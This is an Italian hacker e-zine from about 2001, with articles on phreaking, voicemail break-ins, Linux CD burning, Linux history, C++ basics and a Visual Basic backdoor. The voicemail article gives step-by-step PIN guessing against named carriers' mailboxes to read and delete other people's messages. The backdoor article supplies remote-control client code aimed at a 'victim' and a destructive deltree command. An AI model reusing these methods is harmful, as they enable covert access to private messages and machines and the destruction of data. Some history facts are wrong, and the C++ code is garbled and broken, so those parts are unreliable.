telefonata all'Omnitel (ad es. col trucco del 112), un altro è fottere un povero commerciante che fa il suo lavoro e quindi vende ricariche. E poi noi non siamo ladri! Capito? *************** * CONCLUSIONI * *************** Grazie a tutti voi per l'attenzione... se l'avete avuta... ;-))) In ogni caso per considerazioni, consigli, altri nuovi metodi per telefonare gratizz con i cell e/o altro sul phreak contattatemi per mail a teo1987@libero.it [Se mi mandate mail, rispondo a tutti però, perfavore, non mandatemi mail dicendo: "Si, questo metodo sarebbe anche abbastanza interessante però a me da un po' di fastidio usarlo ogni volta che devo telefonare... Non ne conosci altri per caso? O cmq che mi eviti tutta questo trafficare??". Anche perchè se usare questi metodi vi da tutto questo fastidio, che vi posso dire, andate a COMPRARVELE ste' ricariche, pagate, telefonate e COMPRATE ancora.. tanto i soldi sono vostri! ;-))]. Mi riservo di aggiornare questo articolo con nuovi metodi se in futuro se ne scoprissero altri e pubblicherò, sempre sul mio sito le nuove versioni (ovviamente se i metodi li avete scoperti voi, inserirò qui il vostro articolo assieme al vostro nome). Da Elektro, anche oggi è tutto!! Perciò vi saluto e vi auguro buone scroccate (se ce la fate!!)! ;-)) Azz, dimenticavo, un ringraziamento particolare va a tutti quelli che hanno scritto txt descrivendo i metodi per telefonare o ricaricarsi il cell, di cui, come avrete letto, alcuni loro sistemi li riporto anch'io in questo txt, assieme ai loro nomi, ovviamente. ByeZzZ raga! |-----------------------------------------------------------| |Art. N° <13> : "Abuso di segreterie telefoniche" di Elektro| |-----------------------------------------------------------| <> ------------------------------- <> <> <> <> ABUSO DI SEGRETERIE TELEFONICHE <> <> <> <> By <> <> :: Elektro :: <> <> ------------------------------- <> Autore: Elektro Ora: 9.06 27/06/01 E-mail: teo1987@libero.it Web: www.mondohackers.cjb.net [X-System.cjb.net ;) MondoHackers non esiste +... ;))] Musica: Radio Company Dance Cibo: nulla, solo tanta acqua, col caldo che fa!! Tempo impiegato: qualche minuto del mio tempo --------- DiSCLiMER --------- Non mi assumo nessuna responsabilità sull'uso illegale nell'applicazione delle informazioni contenute in questo articolo. Se vi beccano e qualcuno vi fa il culo, sono solo affari vostri, io pubblico questo articolo con unico scopo educativo ed informativo per dimostrare quali possono essere i "bug" delle segreterie telefoniche e la mancanza di sicurezza che non viene fornita da parte delle compagnie telefoniche. ----- iNTR0 ----- In questo articolo vi illustrerò com'è possibile, in maniera semplicissima, accedere alle segreteria telefoniche, riuscendo a modificare le impostazioni (dal messaggio di benvenuto al codice di identificazione personale ma anche molto altro...) ma anche a leggere gli eventuali messaggi. Il tutto si suddivide in: 1) Segreteria Memotel 2) Segreteria Tim 3) Segreteria Wind 4) segreteria Omnitel ---------------------- [1] Segreteria Memotel ---------------------- Alla Telecazz un giorno venne la bella idea di creare una segreteria che si attivava chiamando un semplice numero telefonico e bastava chiedere l'attivazione senza la cassettina audio che registra i messaggi lasciati. Sponsorizzarono il tutto su delle schede telefoniche... Ricordate?? In ogni caso non importa non è questo quello che conta! Allora, ste' segreterie Memotel sono sempre più usate anche perchè più comode rispetto alle vecchie segreterie con la cassettina ma il problema sta nel fatto che sono buggate... Va beh, meglio per noi che sappiamo tutto (o quasi...)!! ;-) Telefonate a un vostro conoscente o cmq una persona che sappiate abbia sta' segreteria Memotel, lasciate suonare il telefono e aspettate che risponda la segreteria; una volta che siete collegati con la segreteria digitate # dal vostro telefono. Vi risponderà una voce che vi dirà "Inserisca il suo codice di identificazione personale" o una cosa simile. Voi a questo punto digitate 1234 seguito subito da #. Il codice 1234 non è altro che il codice preimpostato da quelli della Telecazz ma di solito poche persone lo cambiano; ma anche se qualcuno fosse più furbo del previsto, non mollate, provate altri codici stupidi tipo 1111, 9876, 5555, la sua data di nascita, i numeri della targa della macchina o del numero di telefono, sempre poi seguiti da #. Ma non vi preoccupate, di solito non dovreste aver difficoltà ad entrare (al massimo fate social engineer...;-))! Una volta dentro alla segreria avrete una guida che vi illustrerà le varie opzioni che potete modificare e, ovviamente, pure ascoltare gli eventuali messaggi per poi scegliere se eliminarli o archiviarli. ------------------ [2] Segreteria Tim ------------------ Ed eccoci alle segreteria telefoniche della Tim che girano sui cell... Che vi posso dire, tutto quello che dovete fare è lo stesso identico lavoro delle segreterie Memotel. L'unica differenza sta' nel fatto che il codice preimpostato da quelli della Tim è il 1111, perciò consiglio di provare quello per primo. Poi quando siete dentro ascoltate sempre la voce della guida. Insomma tutto uguale! ------------------- [3] Segreterie Wind ------------------- Spesso ho sentito parlare e ho anche letto diversi articoli sull'abuso delle segreterie Memotel e Tim, ma non avevo mai sentito dire che anche le segreterie Wind e Omnitel potessero essere buggate. Visto che il cell della mia ex ragazza, ha una bella segreteria Wind ero pure invogliato dal provare ad hackerarlo... Così ho provato e ho scoperto che anche le segreterie Wind sono vulnerabili a quest' "attacco", l'unica differenza nel procedimento sta' nel fatto che invece di premere # bisogna premere l'*. Si inserisce il codice, l'* e se siamo un po' fortunati siamo dentro e ascoltiamo la voce della guida. ---------------------- [4] Segreterie Omnitel ---------------------- Stesso identico lavoro delle segreterie Wind. ----------- C0NCLUSi0Ni ----------- E siamo arrivati alle conclusioni... Che dirvi, con questo testo non avrete imparato chissà cosa di certo ma penso possa sempre essere utile e dimostra la totale mancanza di sicurezza da parte delle compagnie telefoniche, che potrebbero migliorare la situazione... In ogni caso, io consiglio a tutti voi di togliere la segreteria sui vostri cell (se l'avete impostata) oppure inserire un codice difficile da trovare anche perchè penso non siate così felici se altre persone leggessero tranquillamente i vostri messaggi a vostra insaputa... Penso abbiate capito tutto di questo articolo, anche perchè più facile di così non ve lo potevo fare... In ogni caso se avete domande, consigli e/o considerazioni la mia mail è teo1987@libero.it. |--------------------------------------------------------------------------| |Articolo sulla Box... Dovrebbe essere qui... Cazzo... Invece ho dovuto | |ricorrere qualche giorno fa a una brutta formattazione :-( e tra le mille | |cose mi sono dimenticato di salvare l'articolo che avevo appena finito di | |scrivere sulla varie Box... Scusatemi, se ho voglia lo riscriverò per il | |prox |numba dell'e-zine ;) altrimenti... uhmm.. Scriverò qualcos'altro ;-)| |--------------------------------------------------------------------------| ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| L I N U X |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ |--------------------------------------------------| |Art. N° <14> : "Masterizzare sotto linux" di Bartx| |--------------------------------------------------| [Installare, configurare ed usare un masterizzatore ide sotto linux] Introduzione Il software I moduli del kernel Cdrecord Creare un'immagine iso da una directory Esplorare un'immagine iso Masterizzare un'immagine iso Cd Audio Letture consigliate <<<<<<<<<<<<<<<<<<<<<<<<<<< Introduzione >>>>>>>>>>>>>>>>>>>>>>>>>>> Siccome ho avuto non pochi problemi nella installazione del masterizzatore, nella sua configurazione e nella ricerca e nell'uso del software, ho deciso di scirvere questo breve tuttorial che accompagna l'utente passo per passo verso la giusta configurazione della periferica. Ho deciso di concentrarmi sui masterizzatori ide (eide) xchè sono i più popolari, i più economici ed i più difficili da configurare. <<<<<<<<<<<<<<<<<<<<<<<<<<<<< Il software >>>>>>>>>>>>>>>>>>>>>>>>>>>>> Sono necessari per masterizzare: cdrecord programma di scrittura su cd mkisofs programma per la creazione di iso cdda2wav serve per estrarre tracce audio dai cd Opzionali X-cd-roast gui grafica per cdrecord kisocd gui grafica per cdrecord per kde <<<<<<<<<<<<<<<<<<<<<<<<< I moduli del kernel >>>>>>>>>>>>>>>>>>>>>>>>> I masterizzatori ide, per funzionare sotto linux, hanno bisogno di funzionare in emulazione scsi, cioè essere adoperati dal sistema come se fossero tali. Inoltre, se il masterizzatore è riconosciuto come cdrom ide non potra esse riconosciuto ancher come masterizzatore. Per un corretto funzionamento modificare le seguenti opzioni nel kernel: digitare da root: cd /usr/src/linux-x.x.x make xconfig e scegliere le seguenti configurazioni: [Enhanced IDE/MFM/RLL...] IDE/ATAPI CDROM M (NON mettere assolutamente Y) SCSI hostadaptor emulation Y Loopback device Y (serve per esplorare le iso come se fossero cdrom) [SCSI support] SCSI support Y SCSI CD-ROM support - Enable vendor-specific Y SCSI generic support Y [Filesystem] ISO 9660 CDROM filesystem Y Microsoft Joliet cdrom Y Una volta fatte le seguenti modifiche, salvate e d uscite. Digitate poi: make dep make bzImage make modules make modules_install il kernel è compilato, ora non vi resta che copiare l'immagine del nuovo kernel nella directory di boot: cp /usr/src/linux-x.x.x/arch/i386/boot/bzImage /boot/newkernel e aggiungere le impostazioni per fare partire il nuovo kernel al lilo.conf: image = /boot/newkernel #va sostituito dalla dir e dal nome che avete dato al nuovo kernel root = /dev/hdx #hdx va sostituito con il vostro device (copiatelo da quello sopra) label = NewLinux #Etichetta da dare al nuovo kernel read-only #lasciare così Dopo fatto ciò digitate lilo da root. <<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Cdrecord >>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Finito con il kernel riavviate e caricate il nuovo kernel. Dopodichè controllate se avete installato cdrecord digitando da root cdrecord -h: se il programma non c'è scaricatelo da http://freshmeat.net ed installatelo (tar xvfz cdrecord-x.x.x , cd cdrecord-x.x.x , ./configure , make , make install). Ora, se avete configurato correttamente i moduli del kernel, digitando cdrecord --scanbus dovrebbe apparire una lista simile a qesta: 0,0,0 0) 'Philips ' 'CDRW PCCD048 ' 'CD WRITER' 0,1,0 1) 'Philips ' 'CD-ROM PCCD048 ' 'CD-ROM' 0,2,0 2) * 0,3,0 3) * 0,4,0 4) * 0,5,0 5) * 0,6,0 6) * 0,7,0 7) * Questa è la lista dei device. Nel mio caso il primo è il masterizzatore ed il secondo il lettore cdrom. Nel caso non vi apparisse nulla bisogna ricontrollare i moduli. A questo punto prendete nota del device del masterizzatore (a me è 0,0,0), che userete per masterizzare. <<<<<<<<<<<<<< Creare un'immagine iso da una directory >>>>>>>>>>>>>> Prima di cominciare a masterizzare è consigliabile fare un'immagine dei file che si vogliono scrivere. Per fare ciò mettete i file che volete copiare in una dir e scrivete: mkisofs -R -o immagine.iso /directory/sorgente dove immagine.iso è il nome da dare all'immagine e /directory/sorgente è il nome della directory che contiene i file da masterizzare. Con questo metodo si può fare anche la copia di cdrom: basta montare il cdrom (es:mount /dev/cdrom /mnt/cdrom) e sostituire il mount point alla directory sorgente. Es: mkisofs -R -o immagine.iso /mnt/cdrom <<<<<<<<<<<<<<<<<<<<< Esplorare un'immagine iso >>>>>>>>>>>>>>>>>>>>> A volte potrebbe presentarsi la necessità di esplorare, modificare o controllare le immagini iso prima di procedere alla masterizzazione. Per montare un'immagine iso come se fosse un cdrom si può procedere nel seguente modo: mount nome_immagine -r -t iso9660 -o loop /mountpoint es: mount immagine.iso -r -t iso9660 -o loop /mnt/cdrom (ora sapete a che serve il loop nel kernel ;-) <<<<<<<<<<<<<<<<<<<< Masterizzare un'immagine iso >>>>>>>>>>>>>>>>>>>> Dopo aver creato la vostra bella immagine iso e averla controllata, non vi resta che masterizzarla su cdrom: cdrecord -v speed=2 dev=0,0,0 immagine.iso dove: 2 è la velocità di scrittura 0,0,0 è il device del masterizzatore (ricordate cdrecord --scanbus???) immagine.iso è il nome dell'immagine iso che volete masterizzare. <<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Cd Audio >>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Per estrarre le tracce dai cd è necessario cdda2wav. Le tracce si estraggono nel seguente modo: cdda2wav -D /dev/scd0 -S 2 -B -t 1+5 a /dev/sc0 va sostituido il device del lettore cdrom a 2 la velocità di estrazione e a 1+5 la traccia da cui si vole iniziare ad esrtrarre e quella finale se si vuole estrarre tutto il cd omettere l'ultimo parametro (-t 1+5) Per masterizzare i cdaudio basta inserire l'opzione -audio a cd record seguita dal nome delle tracce che si vogliono masterizzare. es: cdrecord -v speed=2 dev=0,0,0 -audio track1.wav track2.wav track2.wav (ecc...) Consiglio di non masterizzare le tracce audio ad una velocità superiore a 2. queste potrebbero presentarsi sporche o potrebbero saltare. <<<<<<<<<<<<<<<<<<<<<<<<<<<<< Various >>>>>>>>>>>>>>>>>>>>>>>>>>>>> Per provare la masterizzazione prima di scrivere basta inserire l'opzione -dummy Es: cdrecord -v -dummy speed=2 dev=0,0,0 immagine.iso Il programma proverà la masterizzazione a laser spendo. <<<<<<<<<<<<<<<<<<<<<<<<< Letture consigliate >>>>>>>>>>>>>>>>>>>>>>>>> kernel howto cdwrite howto man cdrecord man mkisofs man cdda2wav by bartx Un particolare saluto a tutti gli amici di #hack #noflyzone #smanettoni #hx #free.it.warez #slackware #mojodo e tutti quelli che mi sono dimenticato. |------------------------------------------------------| | Art. N° <15> : "Linux: Le basi - Premessa" di Elektro| |------------------------------------------------------| : E : L : E : K : T : R : O : presenta ;) (insomma... stile film americani...ihih :))) # L I N U X : L E B A S I # By Elektro Versione 0.5 PREMESSA -------- Linux negli ultimi anni ha avuto un'esplosione a dir poco spaventosa. Sempre più utenti si stanno avvicinando a questo sistema operativo complesso ma molto flessibile e adattabile. Io per primo è da pochi mesi che mi sono avvicinato alla scoperta di questo potente OS e piano piano sto scoprendo tutti i suoi vantaggi e tutta la sua adattabilità. I destinatari di questa guida non sono di certo amministratori di sistema ma utenti che si sono avvicinati da poco alla scoperta di questo interessante sistema. Per la lettura di questa guida sono richieste un minimo di conoscenze informatiche (molto poche non vi preoccupate..) e tutti i termini in relazione ai sistemi Unix-Linux verranno spiegati in questi volumi su Linux. Inoltre la guida sarà divisa in volumi, i quali conterranno a loro volta un determinato argomento e potranno anche essere distribuiti man mano che il sottoscritto li scrive. FONTI ----- Tutte le fonti da cui ho tratto le informazioni per poter scrivere questa guida, verranno scritte alla fine della guida. COPYRIGHT --------- Questa guida può essere pubblicata in qualsiasi sito internet, può essere stampata e riprodotta ovunque, integralmente o parzialmente purchè non ne venga modificato il nome dell'autore (Elektro). |-----------------------------------------------------| | Art. N° <16> : "Linux: le basi - Storia" di Elektro | |-----------------------------------------------------| LINUX : LE BASI By Elektro LA NASCITA DEI SISTEMI LINUX ---------------------------- I sistemi Unix sono molto diffusi in campo professionale, poichè supportano bene concetti molto importanti, come ad esempio, il collegamento in Rete. L'unico loro difetto è il prezzo molto alto che arriva a raggiungere anche la cifra modesta di parecchi milioni. Proprio per evitare tutto ciò Andrew Tannembaum, professore d'informatica tedesco, negli anni '80 decise di sviluppare un nuovo sistema operativo basato sullo Unix; il nuovo 'mini-sistema' prese il nome di 'Minix'. Decise quindi di vendere l'OS, per soli 150 dollari in modo che studenti o semplici appassionati potessero avvicinarsi al mondo dello Unix senza spendere una cifra esorbitante per comprare un potente OS commerciale. Poco tempo dopo, nella primavera del 1991, Linus Torvalds, uno studente finlandese postò su comp.os.minix il seguente messaggio: "ricordate i vecchi tempi, quando gli uomini erano uomini e si scrivevano da soli i device driver? Non siete stufi che tutto funzioni al primo colpo? Non avete nostalgia delle lunghe notti passate a lottare per far andare il computer? Se tutto questo vi manca sto lavorando al kernel d'un clone Unix..." Con questo annuncio veniva ufficializzato il nuovo sistema, disponibile allora su ftp.funet.fi dove si poteva scaricare il kernel 0.0.1. Il nuovo OS aveva il nome di 'Freax', ma gli amici di Torvalds insistettero perchè venisse dato il nome di 'Linux', come un omaggio al creatore e poi perchè suonava decisamente meglio. Da allora moltissime persone in tutto il mondo cominciarono ad interessarsi del nuovo progetto e nel '93 venne pubblicata la prima versione di Linux, disponibile solamente su Internet. L'intero sistema occupava una decina di MB e doveva essere compilato da zero; occorrevano quindi un po' di competenze per usufuirne. Successivamente, Debian e Slackware, furono le prime a inserire tutto il software in un cd-rom, così da permettere un'installazione anche a chi non aveva grandi competenze informatiche. Il resto è storia! ;) Successivamente nacquero i primi gruppi di discussione locali, i giornali interamente dedicati, nel '95 Linux viene usato per fini commerciali, nacquero altre distribuzioni, quali Caldera, Linux FT, WGS Linux e Red Hat. Nel '96 nasce anche TUX, il pinguino che non è altro che la mscotte del sistema. Nel dicembre '96, infine, venne rilasciata la versione 2.0 del kernel e da allora Linux conobbe uno sviluppo enorme di stabilità e di sicurezza. |------------------------------------------------------------------------| | Art. N° <17> : "Linux : Le basi - Caratteristiche tecniche" di Elektro | |------------------------------------------------------------------------| LINUX : LE BASI By Elektro LE CARATTERISTICHE TECNICHE vol.2 Ma vediamo ora come può essere rapportato linux ad altri sistemi operativi. Innanzitutto linux ha un grande pregio che altri OS non hanno; ovvero è gratuito e essere copiato e distribuito da chiunque. I codici sorgenti (dal kernel a qualsiasi programma) sono a disposizione di chiunque. Di conseguenza chiunque può scrivere programmi ed ecco spiegato il perchè di questo grande coinvolgimento di migliaia di programmatori in tutto il mondo. Inoltre gli studenti hanno potuto, proprio grazie a linux e al suo concetto di OpenSource, studiare un intero sistema operativo, che non è secondo a nessun altro prodotto commerciale. Ma quali sono le caratteristiche tecniche di questo potente OS? Iniziamo con il dire che sono parecchie... Ecco qui di seguito le principali: - Multitasking: ovvero la possibilità di eseguire più programmi in uno stesso momento (mica male... ;)). - Multiuser: più utenti possono usare la stessa macchina. E ogni utente ha determinati diritti sui file, con la possibilità o meno di leggere, scrivere o eseguire i file. Vedremo il tutto più avanti. - Multiplatform: è in grado di girare su diverse piattaforme (non solo INTEL ma anche Digital Alpha, PowerPC, Sun SPARC, Macintosh e MIPS) - Richiede User e Pass ad ogni utente, il che garantisce una certa sicurezza nella gestione del sistema. - Prevede funzioni della memoria tra i processi che non permette a un solo programma di mandare in crash l'intero sistema operativo (linux rulezz.. altro che schermate blu.. ;))). - Console virtuali multiple: normalmente si ha accesso con le combinazioni di tasti ALT-F1, ALT-F2, ..., ecc.Si può arrivare fino a 64 sessioni parallele, ma tutte contemporanee e indipendenti l'una dall'altra. Anche se questo vi può sembrare una cosa strana in realtà ben presto vi accorgerete dell'utilità di tutte queste console! ;) - networking TCP/IP nativo Queste sono le principali caratteristiche tecniche, anche se poi ce ne sarebbero molte altre... Ma penso proprio che per voi possano bastare queste! Quindi da queste informazioni che avete appena letto penso proprio che non sia io quello che vi deva dire come si rapporta linux agli altri OS. Al massimo potete passare nuovamente in rassegna tutte queste caratteristiche e pensare se i sistemi Microsoft hanno queste caratteristiche e poi le conclusioni le traete da soli. ;) ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|-----------------------------|1ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| P R O G R A M M A Z I O N E |0%101ð0101|010:10&101 01*010&101µ01þ010@10101½|-----------------------------|0°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ |----------------------------------------| |Art. N° <18> : "C++ : Le BaSi" di Marvin| |----------------------------------------| ###################### MARVIN mh@altavista.it ###################### Ciao a tutti. Cominciamo subito che non ho molto tempo da perdere. In questo breve tutorial cercherò di fornirvi qualche base della programmazione in C più più.Non pretendo di guidarvi passo passo nella creazione di un videogioco(il che richiederebbe mooooooooooooooooooooooolto tempo),ma le poche cose che apprenderete vi serviranno per realizzare piccoli programmini,come somme,divisioni e cazzatine varie. Vi chiedo scusa in anticipo per eventuali errori di battitura o altro,ma sono le 4 di notte di Lunedì 24 Dicembre e ho tanto vino in corpo da far sembrare Andy Capp un astemio,in più mi circolano sostanze strane provenienti dall'Olanda che è meglio non nominare... Ma prima parliamo delle cose di cui avrete effettivamente bisogno per creare il vostro primo programmino: -tempo -cibo -Un compilatore per Windows(come il Borland C++,ma ne trovate altri da scaricare gratuitamente su Internet -vedi Icc e varie-) o uno per Linux(ogni edizione ne incorpora uno,assieme a quello per C.Io che uso RedHat 7.1 ho a disposizione il Kdevelop) -che volete ancora? Il C++ è un linguaggio simile per sintassi al C,ma non commettete l'errore di considerarlo come un'estensione di esso.E' un linguaggio a sè stante e necessita del rispetto che gli è dovuto.E' simile per sintassi al Java2(il Java2 prende spunto dal C++,ma in esso mancano diverse cose -marcatori come "delete" e "new"-,in più Java2 è tutto strutturato ad oggetti). Il C++ comprende una parte di programmazione ad oggetti,che qui non tratteremo. Non commettete l'errore di considerarlo un linguaggio inutile:ogni linguaggio dimostra la sua utilità se glielo permettete. Il primo programmino che possiamo scrivere in C più più è il solito,trito e ritrito,esempio che stampa sullo schermo il classico "HEllo World": #include void main() { cout <<"Hello World!"; } Spieghiamo meglio l'esempio: - #include <> serve per includere le librerie standard del linguaggio.Una libreria si potrebbe definire come una parte del nosto programma che non necessita di essere scritta perchè è già stata "costruita".Questo facilita di molto il nostro lavoro,e rende il nostro listato più snello da vedere e da compilare. - iostream.h E' la libreria standard che controlla il flusso(streaming) di dati in ingresso(input) e in uscita(output),quindi il nome per intero dovrebbe essere "input-output-streaming". - void main() { } Indica l'inizio della procedura(void) principale(main).All'interno delle parentesi tonde possono essere inseriti dei parametri (ad esempio "argv" o "argc",ma a noi non interessa),mentre dentro le graffe andrà il corpo del nostro programma,variabili,costanti e cazzate varie. - cout<<" " ; Questa istruzione dice al computer che cosa stampare sullo schermo del nostro pc.All'interno degli apici compare il classico Hello World.Possiamo concatenare più <<,in modo da permettere l'inserimento sia di testo che di altri elementi,come le variabili.Ad esempio: cout<<"La variabile1 è " < void main() { //questo è un commento su una linea / * Questo invece,come potrete notare,è un commento alla cazzo di cane,perchè riempire due righe scrivendo cazzate assurde non è una delle cose più facili al mondo.Ringrazio per la pazienza */ } Che bello!Sono riuscito a scrivere un programma in C++!Wow! (idiota...) PRima di esaltarci come cretini,vediamo di rendere l nostro programma un pochino interattivo,altrimenti non ci serve ad un bel cazzo... Per rendere interattivo un programma dobbiamo iniziare a parlare di variabili.Una variabile è,come dice il nome stesso,un elemento che può assumere diversi valori,che possono essere assegnati dal programmatore o da colui che utilizzarà il nostro programma. Nel C++ esistono diversi tipi di variabili: -Integer(int):è una variabile che definisce un numero intero (1,40,555,10002934847475758,ecc...) -Character(char):definisce un carattere battuto dalla tastiera -Double(double):definisce una variabile con la virgola (2,1 , 32,234 , ecc...) -Boolean(bool):particolare tipo di variabile con due valori possibili,TRUE e FALSE -Costante(const):variabile costante,cioè rimane tale per tutto il listato una volta che viene dichiarata. All'interno del nostro programma,una variabile si può dichiarare in due modi: -"Implicitamente" : nome_variabile = valore es. variabile = 2 In questo caso il compilatore dovrebbe capire da solo il tipo di variabile(in questo caso Integer) -"Esplicitamente" : tipo nome_variabile = valore es.double variabile = 3.2 Ora viene definito esplicitamente il tipo della vaariabile (in questo caso double) Nel caso di una variabile costante,la sua dichiarazione avverrà in questo modo: const tipo nome_variabile = valore es. const int variabile = 2 Ma facciamo una prova: #include void main() { int prova = 4; cout <<"Il numero di prova è :" << prova ; } Output: Il numero di prova è : 4 E se volessimo compiere delle operazioni con le variabili?E' possibile anche questo.Mettiamo di voler trovare la somma di due variabili integer,ad esempio 4 e 2.Chiameremo la prima variabile addendo1 e la seconda addendo2.Per trovare la loro somma dovremo dichiarare una terza variabile,anch'essa integer,che per l'occasione chiameremo somma,ed eseguire l'espressione di somma tra le due variabili precedenti.Forse con un esempio la cosa si capisce meglio(è sempre il vino): #include void main() { int addendo1 = 4; //dichiaro il primo addendo dell'operazione int addendo2 = 2; //dichiaro il secondo int somma = addendo1 + addendo2 ; //addizione tra i due addendi cout <<"La somma tra " << addendo1 <<" e " << addendo2 <<" è " << somma; //stampa a video la somma dei due } Ora la cosa dovrebbe essere più chiara,però bisogna introdurre gli operatori aritmetici del C++. Nel C++ esistono i cosidetti "operatori aritmetici",che servono per compiere operazioni tra numeri o variabili. Gli operatori sono i seguenti: + addizione - sottrazione * moltiplicazione / divisione ++ incremento unitario -- decremento unitario Ma se noi volessimo che sia l'utente ad inserire i propri parametri delle variabili?Ancora una volta la risposta è semplice (o quasi):dobbiamo dichiarare una variabile senza inizializzarla,cioè creare una variabile senza assegnarle un valore,perchè il valore lo si assegnerà dopo,tramite un'apposito comando. Per inserire un valore dall'esterno,occorre usare il comando "cin >>variabile" (senza gli apici),dove variabile è il nome della nostra variabile che vogliamo inserire. Ed ecco il nostro esempio: / *Vogliamo creare un programma che ritorna una variabile che inseriamo noi */ #include void main() { int numero; cout <<"Inserisci un numero intero a caso:"; cin >>numero; cout<<"\nIl numero inserito è :" < void main() { const double pigreco = 3.14; double raggio; cout <<"Inserisci il raggio della circonferenza"; cin >>raggio; double risultato = (raggio + raggio) * 3.14 cout <<"\nLa circonferenza è di " << risultato ; } Ellapeppa!!!Ma che cose che possiamo farci con questo bel Cippiùpiù! Cretino!Devo ancora finire per oggi!Ascolta e taci per ora,poi fai il cazzo che ti pare! Che spiegazione sarebbe dei fondamentali del C++ se non mi soffermassi sui costrutti ciclici "while...do" e quelli di scelta condizionata "if...else" ? Allora muoviamoci e proseguiamo che ho fretta di dormire. Un costrutto ciclico è un costrutto(ma va?) che si ripete ciclicamente.Nel C++ esistono due tipi di costrutti ciclici:while...do e for.Ora tratterò del primo,perchè per l'altro ci vorrebbe un poema. Il costrutto while...do (dove "do" non è necessario,e infatti spiegherò solo l'utilizzo di while senza do per essere più veloce) è strutturato in questo modo: while (condizione vera) { esegui questo comando } Per utilizzare while occorre creare una variabile fittizia,ovvero una variabile che non ha uno scopo per la funzionalità del programma ma serve solo al ciclo while di disporre di una condizione vera.La variabile fittizia si pone sempre diversa da 0,il perchè ve lo dimostro ora: #include void main() { int a = 2; //viene posta la variabile fittizia pari a 2 while (a > 1) { / * la condizione di while per il verificarsi dei comandi dentro le { } è che a sia maggiore di 1.Quindi la condizione è verificata,dato che a è uguale a 2 * / //azioni da eseguire } } Ora però sono costretto a fare un breve cenno sugli operatori relazionali,cazzo... Servono a paragonare diversi elementi,e possono essere: == uguale a < minore > maggiore <= minore uguale >= maggiore uguale != diverso da Ma precisamente a cosa mi può servire while?Bhè,una volta che avete terminato di scrivere tutte le vostre operazioni che il programma dovrà eseguire,può darsi che abbiate bisogno di: -Bloccare il costrutto ciclico. Usate "break" (senza apici) -Ricominciare dall'inizio il costrutto ciclico. Usate "continue" (senza apici) Un bell'esempio: #include void main () { int a = 2; while (a > 1) { cout <<"VAFFANCULO MANDO !!!"; continue | break } } Capito vero?In caso contrario non me ne frega niente. E per finire in bellezza parliamo brevemente dei costruttia di scelta condizionata.In questa sede parlerò solo di if...else,e tralascerò la scelta multipla(switch...case). Un costrutto di scelta condizionata permette di compiere scelte che si verificheranno nel caso un'espressione risulti vera.Il costrutto if...else funziona nel seguente modo: if (condizione vera) { //operazioni varie } else { //operazioni varie } Ad esempio,noi vogliamo che,se l'utente sceglie un numero che gli indichiamo,si stampi sullo schermo una cosa diversa in base alla scelta fatta: #include void main() { cout <<"Seleziona un numero: 1 o 2 "; int numero; //dichiare la variabile numero cin >>numero; //attende l'immissione della variabile numero da parte dell'utente if (numero == 1) { //se la condizione è vera... cout <<"\nHai scelto 1!"; //...compi queste operazioni } else { //altrimenti... cout <<"\nHai scelto 2!"; //..fai queste } } All'interno del costrutto if...else (anche in questo caso else non è obbligatorio) possono essere presenti altri costrutti di scelta,il che rende le possibilità di scelta teoricamente infinite. Bhè,con questo avrei finito con 'sto breve tutorial sul cipiùpiù.Spero sia stato di vostro gradimento e che non facciate troppe storie se mancano alcune parti.Il mio scopo era quello di fornire le basi per un newbie che si volesse cimentare nell'impresa di imparare questo bellissimo linguaggio.Sarebbe bello parlare anche della programmazione ad oggetti del C++,ma bisognerebbe introdurre elementi come puntatori,marcatori e roba del genere,che sinceramente escono dallo scopo di questo tutz e non ho proprio il tempo di scrivere perchè ho un sonno che stenderebbe una mandria di bufali cafri. Un saluto a tutti e Buon Natale e felice Anno Nuovo ! |----------------------------------------------------------------| |Art. N° <19> : "Come farsi una bella backdoor in VB" di HolyHack| |----------------------------------------------------------------| COME FARSI UNA BELLA BACKDOOR IN "Visual Basic" Autore.: HolYHaCk E-mail.: holyhack@libero.it mIRC.: irc.oltrelinux.com 6667 Nick.: HolyHack Premessa.: prima di costruire questo strumento e meglio che leggiate una bella guida sul controllo del Winsock.ocx c:> type Backdoor.txt caricamento in corso....... Bene ragazzi,questa è la mia prima guida che tratta lo studio e l'approfondimento del Visual Basic quindi se avete domande o consigli da darmi lo potete fare scrivendomi una Mail. Prima di tutto una backdoor tradotta letteralmente significa "porta posteriore" che permette ad un utente estraneo di far visita al vostro PC senza che voi non ve ne accorgiate. Questo si divide in 2 file : il Client che serve per entrare nel pc della vittima (una volta dato il server) e il server (cioè la backdoor). La backdoor attiva sul pc remoto (quello della vittima) una porta che rimane in ascolto e aspetta che voi vi colleghiate. ( in caso del NetBus la porta in ascolto e la 1234). La backdoor non fa altro che interpetrare una stringa di comando inviata da voi, ESEMPIO: il server riceve la lettera Y che corrisponde ad una stringa X , quindi il messaggio "MUORI" inviato da voi al server può corrispondere a "deltree /y c:\windows\system\*.sys" molto bello !! hehehehe.... Ecco come costruire un CLIENT che vi servirà per entrare nel pc della vittima.Per prima cosa aprite il Visual Basic e inserite un Form + o - cosi: ___________________________________ | | | |Inserire Ip vittima| | | | | |Inserire Porta| |Connetti| | | | | |Invia Messaggio| |Esegui Progr | |__________________________________| Bhè il disegno non è tanto preciso ma cmq ci siamo Vi passo il codice sorgente del client: Private Sub cmdConnetti_Click() Winsock.RemoteHost = txtVittima.Text 'raccoglie i dati Winsock.RemotePort = txtPorta.Text Winsock.Connect 'Connette End Sub Private Sub cmdMandaMessaggio_Click() 'Invia Msg Box alla vittima Winsock.SendData "mess" 'invia una stringa che verrà interpretata dal server End Sub Private Sub cmdEsgui_Click() 'questo invece esegue programma (telnet.exe) Winsock.SendData "esegui" End Sub =============================FINE============================= Ok 